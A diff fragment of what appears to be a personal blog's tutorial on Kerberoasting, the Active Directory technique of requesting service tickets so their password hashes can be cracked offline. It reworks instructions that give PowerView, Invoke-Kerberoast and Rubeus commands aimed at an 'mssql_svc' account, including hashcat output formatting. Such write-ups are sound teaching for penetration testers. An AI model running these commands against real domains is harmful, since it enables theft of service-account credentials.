alexdhital/alexdhital.github.io/source/_posts/research/Kerberoasting and Asreproasting.md

 servicePrincipalName : MSSQLSvc/sql-1.dev.dhitalcorp.local:1433
 userPrincipalName : SQLService@dev.dhitalcorp.local
 ```
-We can request service ticket for this `mssql_svc` service account using Rubeus as below.
-We can also use PowerView itself as `Get-DomainUser -SPN mssql_svc | Get-DomainSPNTicket` or using [Invoke-Kerberoast](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/).
-If you want the hash in specific format for cracking we can also request it using OutputFormat as `Get-DomaintUser -SPN mssql_svc | Get-DomainSPNTicket -OutputFormat hashcat`.
+We can request service ticket for this `mssql_svc` service account and crack it offline.
+- We can also use PowerView to request service ticket for this `mssql_svc` service account:  `Get-DomainUser -SPN mssql_svc | Get-DomainSPNTicket`
+- We can also use [Invoke-Kerberoast](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/) to both find and roast kerberoastable accounts.
+-  If you want the hash in specific format for cracking we can also request it using OutputFormat as `Get-DomaintUser -SPN mssql_svc | Get-DomainSPNTicket -OutputFormat hashcat`.
 Below we are using Rubeus.

 ```bash
 PS C:\Users\Alex> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:mssql_svc /nowrap